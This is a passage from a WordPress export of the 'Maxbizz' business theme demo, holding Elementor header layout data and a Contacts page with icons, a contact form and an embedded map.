Seattle","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"_id":"6e383c8"},{"text":"+1-800-456-478-23","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"_id":"25c4675","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":45,"sizes":[]},"icon_color":"#55BB53","text_color":"#FFFFFF","text_indent":{"unit":"px","size":7,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_line_height":{"unit":"em","size":1,"sizes":[]},"icon_size":{"unit":"px","size":15,"sizes":[]},"icon_typography_font_weight":"500"},"elements":[],"widgetType":"icon-list"}],"isInner":false},{"id":"eb1b801","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"99b486b","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(255, 255, 255, 0)"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","_id":"e7140d6"}],"shape":"circle","align":"","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_spacing":{"unit":"px","size":20,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0.3)","icon_color":"custom","hover_border_color":"#4B82FB","icon_secondary_color":"#8497A5","hover_secondary_color":"#FFFFFF","icon_padding":{"unit":"em","size":0,"sizes":[]}},"elements":[],"widgetType":"social-icons"},{"id":"eb90cd2","elType":"widget","settings":{"text":"FREE QUOTE","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"500","background_color":"#55BB53","hover_color":"#0B2A41","button_background_hover_color":"#F5F5F5","button_hover_border_color":"#55BB53","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"text_padding":{"unit":"px","top":"13","right":"29","bottom":"12","left":"29","isLinked":false},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"10","isLinked":false},"typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"36d15d3","elType":"section","settings":{"structure":"20","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"5bfa0e8","elType":"column","settings":{"_column_size":50,"_inline_size":30},"elements":[{"id":"4aa2514","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Black.svg","id":383},"_padding":{"unit":"px","top":"26","right":"0","bottom":"27","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"b62b09b","elType":"column","settings":{"_column_size":50,"_inline_size":70,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"d943b8e","elType":"widget","settings":{"nav_menu":"main-menu","text_hover_color":"#55BB53","menu_typography_typography":"custom","menu_typography_font_family":"Open Sans","smenu_typography_typography":"custom","smenu_typography_font_family":"Open Sans"},"elements":[],"widgetType":"imenu"},{"id":"64ad134","elType":"widget","settings":{"bg_btn":"#55BB53","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false}},"elements":[],"widgetType":"isearch"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:2:{s:4:"view";i:1;s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:6:{s:10:"text_color";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_line_height";i:1;s:27:"icon_typography_font_weight";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:4;s:5:"align";i:2;s:17:"_ot_content_align";i:2;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:7:{s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:12:"icon_padding";i:1;}s:20:"section_social_hover";a:2:{s:18:"hover_border_color";i:1;s:21:"hover_secondary_color";i:1;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_button";a:1:{s:4:"text";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:13:{s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:16:"background_color";i:1;s:11:"hover_color";i:1;s:29:"button_background_hover_color";i:1;s:25:"button_hover_border_color";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;s:22:"typography_line_height";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:1:{s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:6:"margin";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:3:{s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_family";i:1;}s:19:"style_smenu_section";a:2:{s:27:"smenu_typography_typography";i:1;s:28:"smenu_typography_font_family";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-5/</link>
		<pubDate>Fri, 24 Jul 2020 08:06:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=267</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Maxbizz The Largest Business Expert in USA &amp; Europe. We Provide The Solutions to Grow Your Business.</p>		
			<a href="#" role="button">
						CONTACT US
					</a>
				<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/05_Black.svg" alt="Maxbizz">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				

	
		
	

				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				

	
		
	

				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
								
				<h6>
					Our Working Hours
				</h6>
								<p>Mon - Sat: 8.00 - 18.00</p>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-368"><a href="#">About Us</a></li>
</ul>
</li>
<li id="menu-item-364"><a href="#">Portfolio</a></li>
<li id="menu-item-365"><a href="#">Blog</a></li>
<li id="menu-item-366"><a href="#">Shop</a></li>
<li id="menu-item-367"><a href="#">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>267</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 08:06:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 08:06:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-5]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.4]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"6883fb1","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#F5F5F5"},"elements":[{"id":"bae537d","elType":"column","settings":{"_column_size":33,"_inline_size":86.974999999999994315658113919198513031005859375,"content_position":"center"},"elements":[{"id":"e209fcf","elType":"widget","settings":{"editor":"<p>Maxbizz The Largest Business Expert in USA &amp; Europe. We Provide The Solutions to Grow Your Business.<\/p>","typography_typography":"custom","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"600","text_color":"#5F5F5F"},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3c6c353","elType":"column","settings":{"_column_size":66,"_inline_size":12.0069999999999996731503415503539144992828369140625,"align":"flex-end","_ot_column_min_width":{"unit":"px","size":165,"sizes":[]},"_ot_content_align":"horizontal"},"elements":[{"id":"856df84","elType":"widget","settings":{"text":"CONTACT US","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":13,"sizes":[]},"typography_font_weight":"500","background_color":"#52C5B6","button_background_hover_color":"#30344D","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"text_padding":{"unit":"px","top":"13","right":"28","bottom":"12","left":"28","isLinked":false}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"e4091a8","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"16","right":"0","bottom":"16","left":"0","isLinked":false}},"elements":[{"id":"95b9eb7","elType":"column","settings":{"_column_size":50,"_inline_size":20},"elements":[{"id":"ac2109b","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05_Black.svg","id":389},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"27b0423","elType":"column","settings":{"_column_size":50,"_inline_size":80,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"1f76ab2","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"aec3252","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"26188f4","elType":"widget","settings":{"title_text":"Our Working Hours","description_text":"Mon - Sat: 8.00 - 18.00","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"}],"isInner":false}],"isInner":false},{"id":"df85639","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#30344D","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"5ff3000","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"f7bff2e","elType":"widget","settings":{"nav_menu":"main-menu","text_color":"#FFFFFF","text_hover_color":"#52C5B6","smenu_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":10,"spread":0,"color":""},"menu_typography_typography":"custom","menu_typography_font_weight":"500"},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"42df45d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"94c7570","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false},"icon_color":"#FFFFFF","bg_btn":"#52C5B6"},"elements":[],"widgetType":"isearch"},{"id":"ea13c65","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isidepanel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:4:{s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:10:"text_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:6;s:16:"content_position";i:1;s:5:"align";i:3;s:20:"_ot_column_min_width";i:1;s:17:"_ot_content_align";i:3;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_button";a:1:{s:4:"text";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:10:{s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:16:"background_color";i:1;s:29:"button_background_hover_color";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:3;}s:14:"section_layout";a:1:{s:16:"content_position";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:12:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:4:{s:10:"text_color";i:1;s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_weight";i:1;}s:19:"style_smenu_section";a:1:{s:23:"smenu_shadow_box_shadow";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:2:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}}}s:10:"isidepanel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Contacts</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/contacts/</link>
		<pubDate>Fri, 04 Sep 2020 09:27:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=455</guid>
		<description></description>
		<content:encoded><![CDATA[contact details	        <h3>Our Contacts</h3>	    
		Give us a call or drop by anytime, we endeavour to answer all enquiries within 24 hours on business days. We will be happy to answer your questions.		
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>	        
				<h6>Visit Us Daily</h6>				<p>411 University St, Seattle, USA</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>	        
				<h6><a href="tel:+1-800-456-478-23">Call Us 24/7</a></h6>				<p>+1-800-456-478-23</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>	        
				<h6><a href="mailto: maxbizz@mail.com">Mail Us</a></h6>				<p>maxbizz@mail.com</p>			
										<img width="849" height="878" src="https://maxbizz.s3.amazonaws.com/images/image-contacts.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image-contacts.png 849w, https://maxbizz.s3.amazonaws.com/images/image-contacts-1-290x300.png 290w, https://maxbizz.s3.amazonaws.com/images/image-contacts-1-768x794.png 768w" sizes="(max-width: 849px) 100vw, 849px" />											
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-business/wp-admin/admin-ajax.php#wpcf7-f1319-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="1319" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f1319-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<h4>Ready to Get Started?</h4>
<p><input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /></p>
<p><input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /></p>
<p><input type="text" name="your-site" value="" size="40" aria-invalid="false" placeholder="Website" /></p>
<p><textarea name="your-message" cols="40" rows="10" aria-invalid="false" placeholder="Message..."></textarea></p>
<p><button type="submit">Send Message</button>
</form>		
			<iframe frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="https://maps.google.com/maps?q=411%20University%20St%2C%20Seattle%2C%20USA&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near" title="411 University St, Seattle, USA" aria-label="411 University St, Seattle, USA"></iframe>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>455</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:27:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:27:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contacts]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
